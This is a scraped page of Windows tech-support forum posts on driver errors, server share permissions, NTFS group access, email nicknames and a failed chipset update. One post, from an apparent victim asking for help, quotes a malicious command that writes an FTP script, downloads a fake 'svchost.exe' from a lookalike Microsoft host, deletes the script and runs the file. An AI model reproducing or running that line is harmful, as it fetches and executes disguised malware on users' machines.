I reformatted my computer a couple of days ago becasue certain programs would not open. I successfully reinstalled XP and all my drivers. I had sound. I donwloaded SP2 and my sound disappeared. I uninstalled my soundcard software (soundmax) and re-installed it. Still no sound. I then right clicked on my computer, manage, device manager, and under system devices I found a yellow exclamation point next to plug and play soft device enumerator. This device is not working properly because Windows cannot load the drivers required for this device. (Code 31) Click Troubleshoot to start the troubleshooter for this device. I have uninstalled the device, but when …

Directory Permissions - What gives? 1 2
by Guest Andrew- 27 replies

I shared a directory with one of our Windows 2003 servers and gave a user Full Control accesss to that directory. However, from his computer where he is logged on, he can't copy and paste anything to that directory. If he remote desktop's into the server and logs on as himself, he can browse to another network share and pull the file over without any problems. I never had this problem in Windows 2000. How do I configure a directory on a Windows 2003 server so that people can "push" files to that folder without logging onto the server locally and "pulling" the files over?

NTFS Security Group fails to provide correct access to folders
by Guest stu_derek- 3 replies

I have created a Global Windows security group that contains 10 users and applied the group to a folder on a file server to give the users in this group Read/Mod access to the data contained. However, 8 out of the 10 users have NO access to the folder when I check the 'Effective permissions' (the other two are fine). If I add the users to the folder explicitly then access is ok. It seems that Windows is not succesfully enumerating the group memberships and granting the required level of access to all users. The users are added to a Global group and are not specifically denied access to the folder elsewhere. Has ayone else encountered a situation like t…

Virus Activity?

We had three users (all with XP SP2) that all of a sudden this morning had their task manager open up along with a command prompt. In the command prompt, a statement was input along the lines of the following.... cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &svchost.exe Anyone seen anything like this before? We haven't approved any Windows Updates or anything like that (even though I wouldn't think that would have anything to do with this). That is not a typo (above in the statement where it says mircosoft…

Currently we are using thunderbird email clients. Was wondering if there is a way to add a nickname to the schema that would appear under user manager. An example would be Robert L Smith and a person could just type in RLS to send an email to that person. Linux email server.

nForce SATA update BSOD
by Guest Carlos- 0 replies
In spite of having rejected the Serial ATA optional update for NForce chipsets offered by Windows Update, "it" silently decided that it was imperative and installed by itself at around 2:00 am while I was peacefully sleeping. Woke up at 7:00, went to check my e-mail but the only thing I could see was a BSOD with crash dump and etc. Powered off, rebooted, and Vista x64 would freeze when assemlbing the desktop. Mouse activity, yes. Response: none Root cause: nForce Serial ATA installed. Rebooted, F8, Last Known Good Configuration and everything was back to normal. Serial ATa controller was back to the one released by NVidia during February (version 15.00, …
